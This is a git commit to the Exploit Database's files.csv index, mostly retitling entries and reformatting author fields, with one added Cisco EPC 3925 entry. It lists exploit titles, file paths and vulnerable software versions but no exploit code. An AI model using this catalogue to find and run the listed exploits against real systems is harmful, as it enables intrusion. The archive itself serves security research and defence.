DB: 2016-09-16

3 new exploits

Avaya IP Office Phone Manager - Local Password Disclosure

BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities

PA168 Chipset IP Phones - Weak Session Management Exploit

CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash

phpMyAdmin - '/scripts/setup.php' PHP Code Injection

NScan 0.9.1 - (Target) Buffer Overflow
NScan 0.9.1 - 'Target' Buffer Overflow

Xerox WorkCentre - Multiple Models Denial of Service
Xerox WorkCentre  (Multiple Models) - Denial of Service
Cisco EPC 3925 - Multiple Vulnerabilities

httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit)

Novell eDirectory 8.8sp5 - Buffer Overflow

Uebimiau Webmail 3.2.0-2.0 - Email Disclosure

ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)

Integard Home and Pro 2 - Remote HTTP Buffer Overflow

Multiple D-Link Router Models - Authentication Bypass
D-Link Router (Multiple Models) - Authentication Bypass

iSO Air Files 2.6 - Directory Traversal
iOS FtpDisc 1.0 - Directory Traversal
iOS SideBooks 1.0 - Directory Traversal
iOS FtpDisc 1.0 - Directory Traversal
iOS SideBooks 1.0 - Directory Traversal
iSO Filer Lite 2.1.0 - Directory Traversal
iOS iDocManager 1.0.0 - Directory Traversal
iOS myDBLite 1.1.10 - Directory Traversal
iSO Filer Lite 2.1.0 - Directory Traversal
iOS iDocManager 1.0.0 - Directory Traversal
iOS myDBLite 1.1.10 - Directory Traversal

iOS Share 1.0 - Directory Traversal

iOS TIOD 1.3.3 - Directory Traversal

Zapya Desktop 1.803 - (ZapyaService.exe) Privilege Escalation
Zapya Desktop 1.803 - 'ZapyaService.exe' Privilege Escalation

Dansie Shopping Cart - Server Error Message Installation Full Path Disclosure

Apache/mod_ssl 2.0.x - Remote Denial of Service

SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation

Airlive IP Cameras - Multiple Vulnerabilities

Monkey CMS - Multiple Vulnerabilities

NetBSD mail.local - Privilege Escalation (Metasploit)

Apache Mina 2.0.13 - Remote Command Execution

Apache Mina 2.0.13 - Remote Command Execution

DeepOfix SMTP Server 3.3 - Authentication Bypass

xEpan 1.0.4 - Multiple Vulnerabilities
Humhub 0.10.0-rc.1 - SQL Injection
Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Humhub 0.10.0-rc.1 - SQL Injection
Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities

Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness
Koha 3.20.1 - Multiple SQL Injections
Koha 3.20.1 - Directory Traversal
Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities
Koha 3.20.1 - Multiple SQL Injections
Koha 3.20.1 - Directory Traversal
Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities

8 TOTOLINK Router Models - Backdoor and Remote Code Execution
8 TOTOLINK Router Models - Backdoor / Remote Code Execution

Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow

TestLink 1.9.14 - Cross-Site Request Forgery

PaKnPost Pro 1.14 - Multiple Vulnerabilities

zFTP Client 20061220 - (Connection Name) Local Buffer Overflow
zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow

NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access
NUUO NVRmini 2 3.0.8 - 'strong_user.php' Backdoor Remote Shell Access

Cisco ASA 8.x - Authentication Bypass (EXTRABACON)
Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass
Watchguard Firewalls - ifconfig Privilege Escalation (ESCALATEPLOWMAN)
Cisco ASA / PIX - Privilege Escalation (EPICBANANA)
TOPSEC Firewalls - Remote Code Execution (ELIGIBLECONTESTANT)
TOPSEC Firewalls - Remote Code Execution (ELIGIBLECANDIDATE)
TOPSEC Firewalls - Remote Code Execution (ELIGIBLEBOMBSHELL)
TOPSEC Firewalls - Remote Exploit (ELIGIBLEBACHELOR)
Fortigate Firewalls - Remote Code Execution (EGREGIOUSBLUNDER)
Watchguard Firewalls - 'ESCALATEPLOWMAN' ifconfig Privilege Escalation
Cisco ASA / PIX - 'EPICBANANA' Privilege Escalation
TOPSEC Firewalls - 'ELIGIBLECONTESTANT' Remote Code Execution
TOPSEC Firewalls - 'ELIGIBLECANDIDATE' Remote Code Execution
TOPSEC Firewalls - 'ELIGIBLEBOMBSHELL' Remote Code Execution
TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Exploit
Fortigate Firewalls - 'EGREGIOUSBLUNDER' Remote Code Execution

tcPbX - (tcpbx_lang) Local File Inclusion
tcPbX - 'tcpbx_lang' Local File Inclusion
This commit is contained in:
Offensive Security 2016-09-16 05:08:37 +00:00
parent f1e68e0b1d
commit 751e61a6bf
4 changed files with 1112 additions and 51 deletions

105
files.csv
View file

@ -661,7 +661,7 @@ id,file,description,date,author,platform,type,port
836,platforms/windows/local/836.c,"WWW File Share Pro 2.72 - Local Password Disclosure",2005-02-23,Kozan,windows,local,0
837,platforms/windows/local/837.c,"Chat Anywhere 2.72a - Local Password Disclosure",2005-02-23,Kozan,windows,local,0
838,platforms/multiple/dos/838.pl,"webconnect 6.4.4 < 6.5 - Directory Traversal / Denial of Service",2005-02-24,karak0rsan,multiple,dos,0
839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure",2005-02-24,"Adrian ""pagvac"" Pastor",windows,local,0
839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure",2005-02-24,"Adrian _pagvac_ Pastor",windows,local,0
840,platforms/cgi/webapps/840.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploit",2005-02-24,Silentium,cgi,webapps,0
841,platforms/windows/dos/841.c,"Soldier of Fortune 2 1.03 - 'cl_guid' Server Crash",2005-02-24,"Luigi Auriemma",windows,dos,0
842,platforms/linux/dos/842.c,"WU-FTPD 2.6.2 - File Globbing Denial of Service",2005-02-25,str0ke,linux,dos,0
@ -1743,7 +1743,7 @@ id,file,description,date,author,platform,type,port
2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'logrotate prctl()' Privilege Escalation",2006-07-18,"Marco Ivaldi",linux,local,0
2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Blind SQL Injection",2006-07-18,"Jacek Wlodarczyk",php,webapps,0
2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - SQL Injection (2)",2006-07-18,"w4g.not null",php,webapps,0
2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0
2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian _pagvac_ Pastor",hardware,remote,0
2035,platforms/php/webapps/2035.php,"ToendaCMS 1.0.0 - 'FCKeditor' Arbitrary File Upload",2006-07-18,rgod,php,webapps,0
2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 - Cookie Modification Privilege Escalation",2006-07-18,FarhadKey,php,webapps,0
2037,platforms/windows/dos/2037.c,"Dumb 0.9.3 - (it_read_envelope) Remote Heap Overflow (PoC)",2006-07-19,"Luigi Auriemma",windows,dos,0
@ -2862,7 +2862,7 @@ id,file,description,date,author,platform,type,port
3185,platforms/php/webapps/3185.txt,"RPW 1.0.2 - (config.php sql_language) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0
3186,platforms/asp/webapps/3186.txt,"ASP EDGE 1.2b - (user.asp) SQL Injection",2007-01-24,ajann,asp,webapps,0
3187,platforms/asp/webapps/3187.txt,"ASP NEWS 3.0 - (news_detail.asp) SQL Injection",2007-01-24,ajann,asp,webapps,0
3189,platforms/hardware/remote/3189.sh,"PA168 Chipset IP Phones - Weak Session Management Exploit",2007-01-24,"Adrian ""pagvac"" Pastor",hardware,remote,0
3189,platforms/hardware/remote/3189.sh,"PA168 Chipset IP Phones - Weak Session Management Exploit",2007-01-24,"Adrian _pagvac_ Pastor",hardware,remote,0
3190,platforms/windows/dos/3190.py,"Microsoft Windows - Explorer (.AVI) Unspecified Denial of Service",2007-01-24,shinnai,windows,dos,0
3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 - (MODULES_DIR) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0
3192,platforms/php/webapps/3192.pl,"Xero Portal - 'phpbb_root_path' Remote File Inclusion",2007-01-24,"Mehmet Ince",php,webapps,0
@ -6709,7 +6709,7 @@ id,file,description,date,author,platform,type,port
7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - (index.php serverid) SQL Injection",2008-11-17,eek,php,webapps,0
7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0
7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash",2008-11-18,"Adrian ""pagvac"" Pastor",linux,dos,0
7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash",2008-11-18,"Adrian _pagvac_ Pastor",linux,dos,0
7151,platforms/linux/remote/7151.c,"No-IP DUC 2.1.7 - Remote Code Execution",2008-11-18,XenoMuta,linux,remote,0
7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - (viewalbums.php artistId) SQL Injection",2008-11-18,snakespc,php,webapps,0
7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion",2008-11-18,DSecRG,php,webapps,0
@ -8416,7 +8416,7 @@ id,file,description,date,author,platform,type,port
8918,platforms/php/webapps/8918.txt,"MRCGIGUY Hot Links - 'report.php id' SQL Injection",2009-06-09,"ThE g0bL!N",php,webapps,0
8919,platforms/php/webapps/8919.txt,"Joomla! Component com_realestatemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0
8920,platforms/php/webapps/8920.txt,"Joomla! Component com_vehiclemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0
8921,platforms/php/webapps/8921.sh,"phpMyAdmin - '/scripts/setup.php' PHP Code Injection",2009-06-09,"Adrian ""pagvac"" Pastor",php,webapps,0
8921,platforms/php/webapps/8921.sh,"phpMyAdmin - '/scripts/setup.php' PHP Code Injection",2009-06-09,"Adrian _pagvac_ Pastor",php,webapps,0
8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection",2009-06-10,"Core Security",windows,remote,0
8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db 2.2.x - System Config Disclosure",2009-06-10,StAkeR,php,webapps,0
8924,platforms/php/webapps/8924.txt,"School Data Navigator - (page) Local / Remote File Inclusion",2009-06-10,Br0ly,php,webapps,0
@ -8721,7 +8721,7 @@ id,file,description,date,author,platform,type,port
9242,platforms/windows/dos/9242.py,"WzdFTPD 8.0 - Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",windows,dos,0
9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-24,Moudi,php,webapps,0
9244,platforms/php/webapps/9244.txt,"Joomla! Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0
40297,platforms/windows/local/40297.py,"NScan 0.9.1 - (Target) Buffer Overflow",2016-08-29,hyp3rlinx,windows,local,0
40297,platforms/windows/local/40297.py,"NScan 0.9.1 - 'Target' Buffer Overflow",2016-08-29,hyp3rlinx,windows,local,0
9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0
9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (OSX) - (Font tags) Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote,0
9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - (Authentication Bypass) SQL Injection",2009-07-24,SwEET-DeViL,php,webapps,0
@ -8981,7 +8981,8 @@ id,file,description,date,author,platform,type,port
9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script - 'id' SQL Injection (2)",2009-08-25,Red-D3v1L,php,webapps,0
9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass",2009-08-25,Securitylab.ir,php,webapps,0
9513,platforms/linux/local/9513.c,"Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure (PoC)",2009-08-25,"Jon Oberheide",linux,local,0
9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre - Multiple Models Denial of Service",2009-08-25,"Henri Lindberg",hardware,dos,0
9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre (Multiple Models) - Denial of Service",2009-08-25,"Henri Lindberg",hardware,dos,0
40383,platforms/asp/webapps/40383.txt,"Cisco EPC 3925 - Multiple Vulnerabilities",2016-09-15,"Patryk Bogdan",asp,webapps,80
9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 - (ALLO) Remote Overflow Denial of Service (Metasploit)",2009-08-25,"Francis Provencher",windows,dos,0
9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP - ActiveX Remote Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0
9517,platforms/windows/dos/9517.txt,"Lotus note connector for BlackBerry Manager 5.0.0.11 - ActiveX Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0
@ -9270,7 +9271,7 @@ id,file,description,date,author,platform,type,port
9882,platforms/windows/local/9882.txt,"Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local,0
9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 - Malformed Certificate (PoC)",2009-10-21,Dr_IDE,windows,local,0
9885,platforms/windows/webapps/9885.txt,"httpdx 1.4.6b - source Disclosure",2009-10-21,Dr_IDE,windows,webapps,0
9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit)",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0
9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit)",2009-10-16,"Pankaj Kohli_ Trancer",windows,remote,0
9887,platforms/jsp/webapps/9887.txt,"jetty 6.x < 7.x - Cross-Site Scripting / Information Disclosure / Injection",2009-10-26,"Antonion Parata",jsp,webapps,0
9888,platforms/php/webapps/9888.txt,"Joomla! Component Ajax Chat 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,php,webapps,0
9889,platforms/php/webapps/9889.txt,"Joomla! Component Book Library 1.0 - File Inclusion",2009-10-19,kaMtiEz,php,webapps,0
@ -9285,7 +9286,7 @@ id,file,description,date,author,platform,type,port
9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Folder Disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0
9900,platforms/windows/remote/9900.txt,"NaviCOPA 3.0.1.2 - Source Disclosure",2009-10-14,Dr_IDE,windows,remote,0
9901,platforms/linux/dos/9901.txt,"Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5.0 < 0.5.37 / 0.4.0 < 0.4.14 - (PoC)",2009-10-23,"Zeus Penguin",linux,dos,80
9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 - Buffer Overflow",2009-10-26,"karak0rsan, murderkey",windows,remote,80
9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 - Buffer Overflow",2009-10-26,"karak0rsan_ murderkey",windows,remote,80
9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - Cross-Site Scripting / SQL Injection",2009-10-20,"Amol Naik",php,webapps,0
9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection",2009-10-30,"Securitylab Research",asp,webapps,0
9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 <= 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",windows,remote,1521
@ -10670,7 +10671,7 @@ id,file,description,date,author,platform,type,port
11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0
11662,platforms/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0
11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0
11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re, R4vax",php,webapps,0
11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re_ R4vax",php,webapps,0
11667,platforms/php/webapps/11667.txt,"Joomla! Component com_hezacontent 1.0 - 'id' SQL Injection",2010-03-09,kaMtiEz,php,webapps,0
11668,platforms/windows/remote/11668.rb,"Easy FTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0
11669,platforms/windows/dos/11669.py,"JAD java Decompiler 1.5.8g - (argument) Local Crash",2010-03-09,l3D,windows,dos,0
@ -11436,7 +11437,7 @@ id,file,description,date,author,platform,type,port
12526,platforms/asp/webapps/12526.txt,"ArticleLive (Interspire Website Publisher) - SQL Injection",2010-05-07,Ra3cH,asp,webapps,0
12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Login Bypass",2010-05-07,Ra3cH,asp,dos,0
12528,platforms/windows/local/12528.pl,"AVCON H323Call - Buffer Overflow",2010-05-07,"Dillon Beresford",windows,local,0
12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry, eSage Lab",windows,dos,0
12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry_ eSage Lab",windows,dos,0
12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow Denial of Service (Metasploit)",2010-05-08,"Jeremiah Talamantes",windows,dos,0
12531,platforms/windows/dos/12531.pl,"GeoHttpServer - Remote Denial of Service",2010-05-08,aviho1,windows,dos,0
12532,platforms/php/webapps/12532.txt,"B2B Classic Trading Script - 'offers.php' SQL Injection",2010-05-08,v3n0m,php,webapps,0
@ -13048,7 +13049,7 @@ id,file,description,date,author,platform,type,port
14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - '.wav' Denial of Service",2010-09-07,s-dz,windows,dos,0
14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow (PoC)",2010-09-07,eidelweiss,windows,dos,0
14943,platforms/asp/webapps/14943.txt,"sirang web-based d-control - Multiple Vulnerabilities",2010-09-08,Abysssec,asp,webapps,0
14941,platforms/win_x86/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow",2010-09-07,"Lincoln, Nullthreat, rick2600",win_x86,remote,80
14941,platforms/win_x86/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow",2010-09-07,"Lincoln_ Nullthreat_ rick2600",win_x86,remote,80
14944,platforms/windows/local/14944.py,"Microsoft Visio 2002 - '.DXF' File Stack based Overflow",2010-09-08,Abysssec,windows,local,0
14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0
14949,platforms/windows/dos/14949.py,"Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution",2010-09-09,Abysssec,windows,dos,0
@ -13606,7 +13607,7 @@ id,file,description,date,author,platform,type,port
15663,platforms/windows/local/15663.py,"Mediacoder 0.7.5.4797 - '.m3u' Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0
15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0
15665,platforms/asp/webapps/15665.txt,"Easy Travel Portal 2 - 'travelbycountry.asp' SQL Injection",2010-12-03,"Ulrik Persson",asp,webapps,0
15666,platforms/hardware/webapps/15666.txt,"Multiple D-Link Router Models - Authentication Bypass",2010-12-03,"Craig Heffner",hardware,webapps,0
15666,platforms/hardware/webapps/15666.txt,"D-Link Router (Multiple Models) - Authentication Bypass",2010-12-03,"Craig Heffner",hardware,webapps,0
15668,platforms/windows/remote/15668.html,"Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow",2010-12-03,Dr_IDE,windows,remote,0
15669,platforms/windows/dos/15669.py,"MediaMonkey 3.2.4.1304 - (mp3) Buffer Overflow (PoC)",2010-12-04,0v3r,windows,dos,0
15670,platforms/windows/dos/15670.pl,"Free Audio Converter 7.1.5 - Denial of Service (PoC)",2010-12-04,h1ch4m,windows,dos,0
@ -14019,7 +14020,7 @@ id,file,description,date,author,platform,type,port
16192,platforms/linux/dos/16192.pl,"Novell Iprint - LPD Remote Code Execution",2011-02-18,"Francis Provencher",linux,dos,0
16254,platforms/windows/dos/16254.txt,"Nitro PDF Reader 1.4.0 - Heap Memory Corruption (PoC)",2011-02-28,LiquidWorm,windows,dos,0
16225,platforms/cfm/webapps/16225.txt,"Alcassoft's SOPHIA CMS - SQL Injection",2011-02-24,p0pc0rn,cfm,webapps,0
16226,platforms/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
16226,platforms/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",hardware,remote,0
16196,platforms/php/webapps/16196.txt,"eventum issue tracking system 2.3.1 - Persistent Cross-Site Scripting",2011-02-19,"Saif El-Sherei",php,webapps,0
16197,platforms/php/webapps/16197.txt,"Escort Directory CMS - SQL Injection",2011-02-19,NoNameMT,php,webapps,0
16198,platforms/php/webapps/16198.txt,"Independent Escort CMS - Blind SQL Injection",2011-02-19,NoNameMT,php,webapps,0
@ -14033,8 +14034,8 @@ id,file,description,date,author,platform,type,port
16206,platforms/php/webapps/16206.txt,"Galilery 1.0 - Local File Inclusion",2011-02-22,lemlajt,php,webapps,0
16207,platforms/php/webapps/16207.txt,"dotProject 2.1.5 - Multiple Vulnerabilities",2011-02-22,lemlajt,php,webapps,0
16216,platforms/linux/dos/16216.txt,"Red Hat Linux - stickiness of /tmp",2011-02-23,"Tavis Ormandy",linux,dos,0
16208,platforms/ios/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16209,platforms/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16208,platforms/ios/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
16209,platforms/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
16222,platforms/php/webapps/16222.txt,"course registration management system 2.1 - Multiple Vulnerabilities",2011-02-23,"AutoSec Tools",php,webapps,0
16223,platforms/php/webapps/16223.txt,"VidiScript - SQL Injection",2011-02-23,ThEtA.Nu,php,webapps,0
16220,platforms/php/webapps/16220.py,"ProQuiz 2.0.0b - Arbitrary File Upload",2011-02-23,"AutoSec Tools",php,webapps,0
@ -14042,11 +14043,11 @@ id,file,description,date,author,platform,type,port
16213,platforms/php/webapps/16213.txt,"Hyena Cart - 'index.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
16214,platforms/php/webapps/16214.txt,"tplSoccerStats - 'player.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
16217,platforms/php/webapps/16217.txt,"bitweaver 2.8.1 - Persistent Cross-Site Scripting",2011-02-23,lemlajt,php,webapps,0
16227,platforms/hardware/remote/16227.txt,"iSO Filer Lite 2.1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
16228,platforms/ios/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16229,platforms/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16227,platforms/hardware/remote/16227.txt,"iSO Filer Lite 2.1.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",hardware,remote,0
16228,platforms/ios/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
16229,platforms/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
16230,platforms/windows/dos/16230.py,"Victory FTP Server 5.0 - Denial of Service",2011-02-24,"C4SS!0 G0M3S",windows,dos,0
16231,platforms/ios/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16231,platforms/ios/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
16232,platforms/php/webapps/16232.txt,"WordPress Plugin GigPress 2.1.10 - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",php,webapps,0
16233,platforms/php/webapps/16233.txt,"WordPress Plugin Relevanssi 2.7.2 - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",php,webapps,0
16234,platforms/netware/dos/16234.rb,"Novell Netware - RPC XNFS xdrDecodeString",2011-02-24,"Francis Provencher",netware,dos,0
@ -14081,7 +14082,7 @@ id,file,description,date,author,platform,type,port
16267,platforms/php/webapps/16267.txt,"bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0
16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 / 3.7.x - SQL Injection",2011-03-02,DSecurity,php,webapps,0
16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0
16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",ios,remote,0
16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt_ H@ckk3y",ios,remote,0
16273,platforms/php/webapps/16273.php,"WordPress Plugin PHP Speedy 0.5.2 - (admin_container.php) Remote Code Execution",2011-03-04,mr_me,php,webapps,0
16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Exploit",2011-03-04,kingcope,jsp,webapps,0
16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Root Exploit",2011-03-04,"Todor Donev",hardware,remote,0
@ -18954,7 +18955,7 @@ id,file,description,date,author,platform,type,port
40362,platforms/windows/local/40362.txt,"Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Password Protected TCP Bind Shell (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40364,platforms/php/webapps/40364.txt,"wdCalendar 2 - SQL Injection",2016-09-13,"Alfonso Castillo Angel",php,webapps,80
40365,platforms/windows/local/40365.txt,"Zapya Desktop 1.803 - (ZapyaService.exe) Privilege Escalation",2016-09-13,"Arash Khazaei",windows,local,0
40365,platforms/windows/local/40365.txt,"Zapya Desktop 1.803 - 'ZapyaService.exe' Privilege Escalation",2016-09-13,"Arash Khazaei",windows,local,0
40367,platforms/cgi/webapps/40367.sh,"Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
21673,platforms/windows/dos/21673.txt,"IPSwitch IMail 6.x/7.0.x - Web Calendaring Incomplete Post Denial of Service",2002-07-30,anonymous,windows,dos,0
21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0
@ -20501,7 +20502,7 @@ id,file,description,date,author,platform,type,port
23263,platforms/multiple/dos/23263.txt,"Opera 7.11/7.20 HREF - Malformed Server Name Heap Corruption",2003-10-20,@stake,multiple,dos,0
23264,platforms/php/webapps/23264.txt,"DeskPro 1.1 - Multiple SQL Injections",2003-10-20,"Aviram Jenik",php,webapps,0
